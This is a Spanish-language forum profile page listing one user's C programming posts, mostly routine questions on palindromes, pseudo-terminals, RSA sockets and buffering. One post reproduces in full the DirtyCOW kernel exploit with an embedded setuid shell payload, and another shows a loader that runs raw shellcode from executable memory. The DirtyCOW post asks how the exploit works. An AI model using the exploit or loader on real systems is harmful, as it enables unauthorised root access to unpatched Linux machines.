- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Programación C/C++ / Re: Problema con script C
28 Abril 2017, 10:27 AMCita de: luisito45 en 27 Abril 2017, 21:12 PM
Buenas tardes;
Este script tiene como fin decir si una frase es palindroma o no. Funciona solo con frases que no tienen espacios y no encuentro el fallo. Al meter una frase que contenga espacios no funciona.
Os dejo aquí el código.
https://pastebin.com/vXK1Vy8A
Muchas Gracias
No deberías de hacer el codigo tan amplio sólo para determinar si una palabra es palíndroma.
Código (c) [Seleccionar]
char palabra[20];
char palabra_al_reves[20];
for ( p = 0, i = strlen(palabra); i > 0; --i, ++p )
if ( palabra_al_reves[p] != palabra[i]; )
{
printf("No es palindroma\n");
break;
}
printf("Es palindroma\n");Creo que sería algo así. Consiste en comparar las dos palabras, una desde el principio y la otra desde el final.
#3
Programación C/C++ / Re: Por que este programa corre bien de esta forma y no de esta otra C
28 Abril 2017, 10:22 AM
Precisamente no funciona porque has añadido un ';' al final del bucle for.
Que un programa compile no es sinonimo de que funcione, es sinonimo de que sintácticamente está bien.
Que un programa compile no es sinonimo de que funcione, es sinonimo de que sintácticamente está bien.
#4
Programación C/C++ / Re: Utilizar recursos graficos con PTY Linux C
27 Abril 2017, 15:53 PMCita de: MAFUS en 27 Abril 2017, 15:41 PM
El penúltimo argumento de openpty es const struct termios *termp. Con ella controlas el comportamiento del terminal. A lo mejor tu solución está por aquí.
Casi, ya he encontrado el error. Tenía que haberme fijado un poco más.
No hay que usar la estrutura termios para controlarlo. Depende totalmente del usuario, por así decirlo.
Demostración: https://github.com/Mester19/glibc/blob/master/login/openpty.c
Cuando accedes a la funcion, sólo se establece la estructura termios para el esclavo. La idea es que el STDIN reciba y envíe los datos en RAW. Se arregla poniendo el siguiente codigo en la parte del proceso padre:
Código (c) [Seleccionar]
tcgetattr(STDIN_FILENO, &term);
cfmakeraw(&term);
tcsetattr(STDIN_FILENO, &term);
#5
Programación C/C++ / Utilizar recursos graficos con PTY Linux C
27 Abril 2017, 14:21 PM
Hola.
Estaba trasteando con los pty's y al hacer unos cuantos me he dado cuenta de que no puedo utilizar correctamente NCURSES o moverme por el input del terminal como desearía.
Buscando imitar a SSH he mirado su codigo para ver como lo hace, pero al imitarlo me sale prácticamente lo mismo. Ejemplo del codigo:
Gracias, de antemano.
Estaba trasteando con los pty's y al hacer unos cuantos me he dado cuenta de que no puedo utilizar correctamente NCURSES o moverme por el input del terminal como desearía.
Buscando imitar a SSH he mirado su codigo para ver como lo hace, pero al imitarlo me sale prácticamente lo mismo. Ejemplo del codigo:
Código (c) [Seleccionar]
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <pty.h>
#include <utmp.h>
#include <sys/select.h>
int
main(void)
{
int fdm, fds;
openpty(&fdm, &fds, NULL, NULL, NULL);
if ( fork() == 0 )
{
close(fdm);
login_tty(fds);
dup2(fds, 0);
dup2(fds, 1);
dup2(fds, 2);
close(fds);
char *arg[] = {NULL};
execvp("/bin/bash", arg);
}
else
{
fd_set fd;
while ( 1 )
{
char put;
FD_ZERO(&fd);
FD_SET(0, &fd);
FD_SET(fdm, &fd);
select(fdm+1, &fd, NULL, NULL, NULL);
if ( FD_ISSET(0, &fd) )
{
read(0, &put, 1);
write(fdm, &put, 1);
}
if ( FD_ISSET(fdm, &fd) )
{
read(fdm, &put, 1);
write(1, &put, 1);
}
}
close(fdm);
}
return 0;
}Gracias, de antemano.
#6
Programación C/C++ / Error en la estructura in_addr
23 Marzo 2017, 12:51 PM
Tengo los siguientes codigos:
cliente:
Servidor:
El problema que tengo principalmente es que no quiero usar la funcion gethostbyname, y me he hecho una propia utilizando getaddrinfo. Lo que hago es intentar establecer una conexion con el servidor, pero nunca funciona. El error está en el connect, creo, pero no encuentro el por qué no conecta.
El localhost sí funciona, pero con una ip remota no.
Gracias de antemano.
cliente:
Código (c) [Seleccionar]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/pem.h>
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/evp.h>
#include <openssl/bio.h>
#include <openssl/err.h>
int getipbyhostname ( const char *hostname, char *ip,
size_t size, struct in_addr *in ) {
int fd;
char *r_host = (char *)hostname;
struct sockaddr_in *r_addr = NULL;
struct addrinfo info_addr, *res_addr, *r;
info_addr.ai_family = AF_INET;
info_addr.ai_socktype = SOCK_STREAM;
info_addr.ai_flags = AI_PASSIVE;
info_addr.ai_protocol = 0;
info_addr.ai_addr = NULL;
info_addr.ai_canonname = NULL;
info_addr.ai_next = NULL;
if ( getaddrinfo ( r_host, NULL, &info_addr, &res_addr ) != 0 )
return -1;
for ( r = res_addr; r != NULL; r = r->ai_next ) {
if ( r->ai_family == AF_INET ) {
if ( (fd = socket ( r->ai_family, r->ai_socktype, r->ai_protocol )) != -1 )
break;
close ( fd );
}
}
r_addr = (struct sockaddr_in *)r->ai_addr;
if ( in != NULL ) {
memcpy ( (void *)in, (void *)&r_addr->sin_addr, sizeof ( struct in_addr ) );
} strncpy (ip, inet_ntoa ( r_addr->sin_addr ), size);
freeaddrinfo ( res_addr );
return 0;
}
int main (int argc, char **argv) {
if ( argc < 3 ) {
return fprintf ( stderr, "%s <host> <port>\n", argv[0] );
}
int port = atoi ( argv[2] );
int sc, rd, e_size, pub_len = 2048;
char host_ip[15];
char *r_host = argv[1];
char msg[] = "This is a successful test text did in C";
char encrypt_msg[256];
char *pub_key = calloc ( pub_len, sizeof ( char ) );
struct in_addr *inaddr_st = (struct in_addr *)malloc ( sizeof ( struct in_addr ) );
struct sockaddr_in c_addr;
RSA *rsa = NULL;
if ( getipbyhostname ( r_host, (char *)&host_ip, sizeof ( host_ip ), inaddr_st ) == -1 ) {
return fprintf ( stderr, "Error getting host %s\n", argv[1] );
}
// opening the socket
if ( (sc = socket ( AF_INET, SOCK_STREAM, 0 )) == -1 ) {
return fprintf ( stderr, "Error opening socket\n" );
}
c_addr.sin_family = AF_INET;
c_addr.sin_port = htons ( port );
c_addr.sin_addr = *inaddr_st;
// memcpy ( (void *)&c_addr.sin_addr, (void *)inaddr_st, sizeof ( struct in_addr ) );
printf ("%s\ndd", inet_ntoa ( c_addr.sin_addr ));
if ( connect ( sc, (struct sockaddr *)&c_addr, sizeof ( c_addr ) ) == -1 ) {
return fprintf ( stderr, "Error connecting to the host\n" );
}
// receiving the public key
rd = recv ( sc, pub_key, pub_len, 0 );
// encrypting the message
d2i_RSAPublicKey ( &rsa, (const unsigned char **)&pub_key, rd );
if ( rsa == NULL ) {
return fprintf ( stderr, "Error creating RSA public key\n" );
}
if ( (e_size = RSA_public_encrypt ( strlen ( msg ), (unsigned char *)msg,
(unsigned char *)&encrypt_msg, rsa, RSA_PKCS1_PADDING )) == -1 ) {
return fprintf ( stderr, "Error creating RSA key\n" );
}
// sending encrypted message
send ( sc, encrypt_msg, e_size, 0 );
close ( sc );
return 0;
}
Servidor:
Código (c) [Seleccionar]
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <openssl/bio.h>
#include <openssl/pem.h>
#include <openssl/x509.h>
#include <openssl/rsa.h>
#include <openssl/bn.h>
RSA *RSA_generate ( int bits ) {
RSA *rsa = RSA_new ();
BIGNUM *e = BN_new ();
BN_set_word ( e, RSA_F4 );
if ( RSA_generate_key_ex ( rsa, bits, e, NULL ) == -1 )
return NULL;
BN_clear_free ( e );
return rsa;
}
char *getRSAPrivateKey ( RSA *rsa ) {
int i;
char *priv_key = NULL;
if ( (i = i2d_RSAPrivateKey ( rsa, (unsigned char **)&priv_key )) == -1 )
return NULL;
priv_key[i] = '\0';
return priv_key;
}
char *getRSAPublicKey ( RSA *rsa ) {
int i;
char *pub_key = NULL;
if ( (i = i2d_RSAPublicKey ( rsa, (unsigned char **)&pub_key )) == -1 )
return NULL;
pub_key[i] = '\0';
return pub_key;
}
int createListenSocket ( int port, struct sockaddr_in *s_addr, int size ) {
int sc;
if ( (sc = socket ( AF_INET, SOCK_STREAM, 0 )) == -1 )
return -1;
s_addr->sin_family = AF_INET;
s_addr->sin_port = htons ( port );
s_addr->sin_addr.s_addr = INADDR_ANY;
if ( bind ( sc, (struct sockaddr *)s_addr, size ) == -1 )
return -1;
if ( listen ( sc, 1 ) == -1 )
return -1;
return sc;
}
int main () {
int sc, cc;
int rd, len;
char *pub_key = NULL;
char *priv_key = NULL;
unsigned char encrypt_data[256];
unsigned char decrypt_data[2048];
struct sockaddr_in s_addr, c_addr;
RSA *rsa = NULL;
// generate rsa 2048
if ( (rsa = RSA_generate ( 2048 )) == NULL )
return fprintf ( stderr, "Error creating RSA keys\n" );
// getting public key
pub_key = getRSAPublicKey ( rsa );
priv_key = getRSAPrivateKey ( rsa );
if ( pub_key == NULL || priv_key == NULL )
return fprintf ( stderr, "Error creating public and private key\n" );
// creating listen socket
sc = createListenSocket ( 33177, &s_addr, sizeof ( s_addr ) );
// waiting client connection
len = sizeof ( c_addr );
if ( (cc = accept ( sc, (struct sockaddr *)&c_addr, (socklen_t *)&len )) == -1 )
return fprintf ( stderr, "Error accept() calling\n" );
// sending public key
send ( cc, pub_key, 2048, 0 );
// receiving crypt message
rd = recv ( cc, encrypt_data, sizeof ( encrypt_data ), 0 );
if ( rd <= 0 )
return fprintf ( stderr, "Error receiving information\n" );
if ( (len = RSA_private_decrypt ( rd, encrypt_data, decrypt_data, rsa, RSA_PKCS1_PADDING )) == -1 ) {
return fprintf ( stderr, "Error decrypting message\n" );
} decrypt_data[len] = '\0';
printf ("%s\n", decrypt_data);
RSA_free ( rsa );
close ( cc );
close ( sc );
return 0;
}
El problema que tengo principalmente es que no quiero usar la funcion gethostbyname, y me he hecho una propia utilizando getaddrinfo. Lo que hago es intentar establecer una conexion con el servidor, pero nunca funciona. El error está en el connect, creo, pero no encuentro el por qué no conecta.
El localhost sí funciona, pero con una ip remota no.
Gracias de antemano.
#7
Programación C/C++ / Ejecutar shellcode en C
3 Marzo 2017, 16:01 PM
Hola.
Estoy intentando ejecutar una shellcode que genero con el programa xxd de esta manera:
Una vez tengo la shell generada en el fichero some.c intento ejecutarlo de esta manera:
Al compilar el programa no da ningún error. Cuando lo ejecuto me da violacion de segmento.
También he probado cargando en memoria el programa de esta manera:
Y me pasa lo mismo xd. ¿Cómo puedo ejecutar codigo en hexadecimal en C? Es decir, lo que viene a ser coger el codigo en lenguaje máquina codificado en hex y ejecutarlo en otro programa en C.
Yo creo que lo que tengo que hacer es cargarlo en memoria y ejecutar esa posicion de memoria, pero no sé qué hago mal en este proceso ni el por qué de la violación de segmento.
Gracias de antemano.
Estoy intentando ejecutar una shellcode que genero con el programa xxd de esta manera:
Código [Seleccionar]
xxd -i executable >> some.c
Una vez tengo la shell generada en el fichero some.c intento ejecutarlo de esta manera:
Código [Seleccionar]
unsigned char shell[] = { ... };
void (*sh)();
sh = (void (*)())shell;
(void)(*sh)();
Al compilar el programa no da ningún error. Cuando lo ejecuto me da violacion de segmento.
También he probado cargando en memoria el programa de esta manera:
Código [Seleccionar]
void *f = mmap ( 0, sizeof ( shell ), PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANON, -1, 0 );
memcpy ( f, shell, sizeof ( shell );
void (*sh)() = (void (*)())f;
(void)(*sh)();
Y me pasa lo mismo xd. ¿Cómo puedo ejecutar codigo en hexadecimal en C? Es decir, lo que viene a ser coger el codigo en lenguaje máquina codificado en hex y ejecutarlo en otro programa en C.
Yo creo que lo que tengo que hacer es cargarlo en memoria y ejecutar esa posicion de memoria, pero no sé qué hago mal en este proceso ni el por qué de la violación de segmento.
Gracias de antemano.
#8
Programación C/C++ / Obtener el ancho de banda en un programa C
13 Diciembre 2016, 16:59 PM
Hola.
Principalmente, mi duda es esa. He leído que con el programa iperf3 se puede obtener y tal, me parece muy bien, pero quiero hacer una función que me devuelva en ancho de banda de un ordenador Linux sin depender de programas. La cuestión es... ¿como puedo medir el ancho de banda?
Esta cuestion viene porque estoy haciendo un cliente de SFTP y me gustaría saber como puedo descargar los ficheros con sockets sin tener que limitarlo a 1024 bytes por segundo u otro numero. Si me ciño al tamaño del fichero, como pueda ser 5MB puede que supere el ancho de banda de la red, o directamente puede que al reservar la memoria para almacenar eso me dé algún error.
Mi duda final, básicamente, es ¿como puedo obtener el ancho de banda de una conexión? Tal y como se ve cuando se ejecuta pacman en ArchLinux a la hora de descargar un paquete y tal. Que indica el ancho de banda.
Gracias de antemano.
Principalmente, mi duda es esa. He leído que con el programa iperf3 se puede obtener y tal, me parece muy bien, pero quiero hacer una función que me devuelva en ancho de banda de un ordenador Linux sin depender de programas. La cuestión es... ¿como puedo medir el ancho de banda?
Esta cuestion viene porque estoy haciendo un cliente de SFTP y me gustaría saber como puedo descargar los ficheros con sockets sin tener que limitarlo a 1024 bytes por segundo u otro numero. Si me ciño al tamaño del fichero, como pueda ser 5MB puede que supere el ancho de banda de la red, o directamente puede que al reservar la memoria para almacenar eso me dé algún error.
Mi duda final, básicamente, es ¿como puedo obtener el ancho de banda de una conexión? Tal y como se ve cuando se ejecuta pacman en ArchLinux a la hora de descargar un paquete y tal. Que indica el ancho de banda.
Gracias de antemano.
#9
Bugs y Exploits / DirtyCOW funcionamiento
25 Octubre 2016, 23:58 PM
Hola. Me he descargado de exploit-db.com el exploit DirtyCOW, y estoy aprendiendo a programar en C y me gustaría entenderlo un poco. Adjunto codigo:
Por lo que tengo entendido en el codigo, primeramente, se llama a la funcion mmap, la cual copia el contenido del fichero en memoria. Después se llama a la funcion madvise en el thread madviseThread, que no sé lo que hace exactamente xd, y finalmente llama al thread procselfmemThread, que escribe en el contenido del fichero cargado en memoria el payload que hay declarado en 'sc'. Y bueno, la funcion waitForWrite que busca si se ha escrito en el fichero.
Lo que me gustaría saber es, primero, ¿que hace la funcion mmap exactamente?, segundo, ¿que hace la funcion madvise?, tercero, ¿para qué lo meten en un bucle tan grande?, cuarto, si se carga en memoria el fichero, ¿cómo se escribe el fichero cargado en memoria al fichero real almacenado en el disco?, y por último, si en la funcion del thread procselfmemThread en el write escribo "write (f, str, sc_len) == sc_len" ¿no debería de acabar ya que se supone que ha escrito los bytes de sc_len en el fichero objetivo?
Gracias de antemano.
Código (c) [Seleccionar]
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd is overwritten
* Popping root shell.
* Don't forget to restore /tmp/bak
* thread stopped
* thread stopped
* root@box:/root/cow# id
* uid=0(root) gid=1000(foo) groups=1000(foo)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <unistd.h>
void *map;
int f;
int stop = 0;
struct stat st;
char *name;
pthread_t pth1,pth2,pth3;
// change if no permissions to read
//char suid_binary[] = "/usr/bin/passwd";
char suid_binary[] = "mydirty";
/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
unsigned char sc[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;
void *madviseThread(void *arg)
{
int i,c=0;
for(i=0;i<1000000 && !stop;i++) {
c+=madvise(map,100,MADV_DONTNEED);
}
printf("thread stopped\n");
return NULL;
}
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<1000000 && !stop;i++) {
lseek(f,(off_t)map,SEEK_SET);
c+=write(f, str, sc_len);
}
printf("thread stopped\n");
return NULL;
}
void *waitForWrite(void *arg) {
char buf[sc_len];
for(;;) {
FILE *fp = fopen(suid_binary, "rb");
fread(buf, sc_len, 1, fp);
if(memcmp(buf, sc, sc_len) == 0) {
printf("%s is overwritten\n", suid_binary);
break;
}
fclose(fp);
sleep(1);
}
stop = 1;
printf("Popping root shell.\n");
printf("Don't forget to restore /tmp/bak\n");
system(suid_binary);
return NULL;
}
int main(int argc,char *argv[]) {
char backup[1024];
printf("DirtyCow root privilege escalation\n");
printf("Backing up %s.. to /tmp/bak\n", suid_binary);
sprintf(backup, "cp %s /tmp/bak", suid_binary);
system(backup);
f = open(suid_binary,O_RDONLY);
fstat(f,&st);
printf("Size of binary: %d\n", st.st_size);
char payload[st.st_size];
memset(payload, 0x90, st.st_size);
memcpy(payload, sc, sc_len+1);
map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("Racing, this may take a while..\n");
pthread_create(&pth1, NULL, &madviseThread, suid_binary);
pthread_create(&pth2, NULL, &procselfmemThread, payload);
pthread_create(&pth3, NULL, &waitForWrite, NULL);
pthread_join(pth3, NULL);
return 0;
}Por lo que tengo entendido en el codigo, primeramente, se llama a la funcion mmap, la cual copia el contenido del fichero en memoria. Después se llama a la funcion madvise en el thread madviseThread, que no sé lo que hace exactamente xd, y finalmente llama al thread procselfmemThread, que escribe en el contenido del fichero cargado en memoria el payload que hay declarado en 'sc'. Y bueno, la funcion waitForWrite que busca si se ha escrito en el fichero.
Lo que me gustaría saber es, primero, ¿que hace la funcion mmap exactamente?, segundo, ¿que hace la funcion madvise?, tercero, ¿para qué lo meten en un bucle tan grande?, cuarto, si se carga en memoria el fichero, ¿cómo se escribe el fichero cargado en memoria al fichero real almacenado en el disco?, y por último, si en la funcion del thread procselfmemThread en el write escribo "write (f, str, sc_len) == sc_len" ¿no debería de acabar ya que se supone que ha escrito los bytes de sc_len en el fichero objetivo?
Gracias de antemano.
#10
Programación C/C++ / Re: ¿Por qué es necesario fflush ()?
9 Octubre 2016, 20:41 PMCita de: geeke en 7 Octubre 2016, 16:29 PM
El buffer se vacía si ocurre alguno de estos tres puntos:
1) Cuando el buffer se llena.
2) Si el texto enviado a la salida estándar termina en '\n'.
3) Mediante la llamada a fflush(stdout).
En tu caso se puede omitir la llamada a fflush(stdout) ya que con el salto de linea se vacía el buffer.
¿Y cuando sé que el buffer está lleno? o ¿cómo se su cantidad maxima?